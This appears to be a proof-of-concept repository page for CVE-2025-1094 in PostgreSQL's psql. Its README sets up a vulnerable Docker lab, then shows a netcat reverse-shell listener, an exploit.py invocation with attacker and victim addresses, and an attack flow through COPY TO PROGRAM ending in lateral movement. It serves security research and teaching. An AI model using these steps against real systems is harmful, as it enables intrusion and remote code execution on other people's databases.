CVE-2025-1094 PoC — PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation

Source

Associated Vulnerability

Readme

# 🛠️ CVE-2025-1094 Lab Setup

> ⚠️ **Disclaimer**  
> This lab is for **educational and research purposes only**.  
> Do **NOT** use any of the information or techniques demonstrated here on systems you do not own or have explicit permission to test. Unauthorized use of these methods **may violate laws** and result in severe penalties.

---

## 📌 Overview

**CVE-2025-1094** is a critical vulnerability affecting **PostgreSQL**’s interactive tool **`psql`**, discovered in version **14.15** and earlier.  
It allows attackers to perform **SQL Injection** which can lead to **Remote Code Execution (RCE)** under certain conditions.

---

## 🧨 Root Cause

The vulnerability arises from **improper handling of malformed UTF-8 input** in `psql`.  
Due to insufficient validation, attackers can inject arbitrary SQL or meta-commands like `!` (shell escape), and even exploit `COPY ... TO PROGRAM` to run system commands.

---

## 🔥 Impact and Attack Scenarios

- **SQL Injection → RCE**: Malformed UTF-8 strings bypass validation and lead to arbitrary query execution.  
- **Abuse of `COPY TO PROGRAM`**: Attackers can execute arbitrary shell commands such as:
  - Reverse shells
  - Reading sensitive files (`/etc/passwd`)
  - Combining with other CVEs for full unauthenticated RCE  
- **Integration Risk**: Software using `psql` with untrusted input (e.g., BeyondTrust PRA, Remote Support) is particularly exposed.

---

## 🧪 Lab Requirements

### 🐳 Victim (Ubuntu)

Install Docker:

```bash
sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER
```

👉 **Reboot** or **log out & log in again** to apply Docker group permissions.

---

### 🐍 Attacker (Kali)

Install Python and dependencies:

```bash
sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional
```

✅ Ensure **network connectivity** between attacker and victim machines.

---

## ⚙️ Step 1 – Deploy Vulnerable PostgreSQL Container (Victim)

1. **Pull PostgreSQL 14.15 image**:

```bash
docker pull postgres:14.15
```

2. **Run the container**:

```bash
docker run --name vulnerable_postgres   -e POSTGRES_USER=postgres123   -e POSTGRES_PASSWORD=StrongP@ssWord   -e POSTGRES_DB=labdb   -p 5432:5432   -d postgres:14.15
```

3. **Wait ~5s for initialization**, then create a demo table:

```bash
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF
```

---

### ✅ Step 1.5 – Verify the container and database setup

After starting the container, verify everything is working with the following commands:

**1. Check that the PostgreSQL container is running:**

```bash
sudo docker ps
```

📌 You should see a container named `vulnerable_postgres` listening on port `5432`.

---

**2. Access the container and inspect the database:**

```bash
sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb
```

Inside the `psql` shell, run:

```sql
SELECT * FROM users;
```

Expected output:

```
 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)
```

Exit from `psql`:

```
\q
```

✅ Now your vulnerable PostgreSQL instance is running and ready for exploitation.

---

**3. Turn the container back on**

```bash
sudo docker start vulnerable_postgres
```

## 📡 Step 2 – Exploit from Attacker Machine

1. **Start a listener** on the attacker machine to catch the reverse shell:

```bash
nc -lvnp 4444
```

2. **Run the exploit script** (adjust IP and port if needed):

```bash
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
```

3. If successful, you’ll receive a reverse shell from the vulnerable PostgreSQL container 🎉
```bash
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.
```
---

## 🧰 Example Exploitation Flow

1. Inject malformed UTF-8 to bypass input validation  
2. Exploit `COPY ... TO PROGRAM` to execute arbitrary shell commands  
3. Reverse shell connects back to the attacker machine  
4. Escalate privileges or move laterally inside the environment

---

💡 **Tip:** You can snapshot this vulnerable container and reuse it later without rebuilding the environment.

File Snapshot

 [4.0K]  /data/pocs/43e1647e9c6b344a5b415dea8766394773856367
├── [1.7K]  exploit.py
└── [4.8K]  README.md

1 directory, 2 files

Remarks